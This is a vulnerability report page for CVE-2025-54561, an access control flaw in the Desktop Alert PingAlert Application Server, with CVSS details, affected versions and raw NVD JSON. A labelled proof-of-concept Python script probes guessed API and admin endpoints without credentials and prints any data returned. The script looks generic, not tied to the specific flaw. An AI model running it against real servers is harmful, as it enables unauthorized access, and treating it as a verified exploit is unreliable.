Security Vulnerability Report
CVE-2025-54561 CVSS 4.3 MEDIUM

CVE-2025-54561

Published: 2025-11-14 18:15:50
Last Modified: 2025-11-20 14:46:20

Description

An Incorrect Access Control vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 which allows remote access to content despite lack of the correct permission through a Broken Authorization Schema.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:desktopalert:pingalert_application_server:*:*:*:*:*:*:*:* - VULNERABLE
Desktop Alert PingAlert 6.1.0.11
Desktop Alert PingAlert 6.1.0.12
Desktop Alert PingAlert 6.1.0.13
Desktop Alert PingAlert 6.1.0.14
Desktop Alert PingAlert 6.1.1.0
Desktop Alert PingAlert 6.1.1.1
Desktop Alert PingAlert 6.1.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys

import requests


def exploit_cve_2025_54561(target_url):
    """
    PoC for CVE-2025-54561: Desktop Alert PingAlert Incorrect Access Control
    This PoC demonstrates unauthorized access to protected resources.
    """
    print(f"[*] Targeting: {target_url}")
    print("[*] Exploiting CVE-2025-54561\n")

    # Common endpoints that might be accessible without proper authorization
    endpoints = [
        "/api/alerts",
        "/api/configurations",
        "/api/system-info",
        "/api/users/list",
        "/api/settings",
        "/api/logs",
        "/admin/dashboard",
        "/admin/config",
    ]

    for endpoint in endpoints:
        url = f"{target_url.rstrip('/')}{endpoint}"
        try:
            # Send request without authentication headers
            response = requests.get(url, timeout=10, verify=False)
            print(f"[+] Endpoint: {endpoint}")
            print(f"    Status Code: {response.status_code}")

            # Check if access was granted (status 200) without proper auth
            if response.status_code == 200:
                print("    [!] VULNERABLE: Unauthorized access granted!")
                print(f"    Response preview: {response.text[:200]}...\n")
            else:
                print("    [-] Access denied or not found\n")
        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing {endpoint}: {str(e)}\n")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com:8080")
        sys.exit(1)

    target = sys.argv[1]
    exploit_cve_2025_54561(target)
```

References

https://desktopalert.net (Product)
https://desktopalert.net/cve-2025-54561/ (Vendor Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-54561",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-14T18:15:49.527",
    "lastModified": "2025-11-20T14:46:20.203",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An Incorrect Access Control vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 which allows remote access to content despite lack of the correct permission through a Broken Authorization Schema."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-284"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:desktopalert:pingalert_application_server:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "6.1.0.11",
                "versionEndExcluding": "6.1.1.5",
                "matchCriteriaId": "35DFA98A-F509-4F93-99A3-807C4B6548A2"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://desktopalert.net",
        "source": "[email protected]",
        "tags": ["Product"]
      },
      {
        "url": "https://desktopalert.net/cve-2025-54561/",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```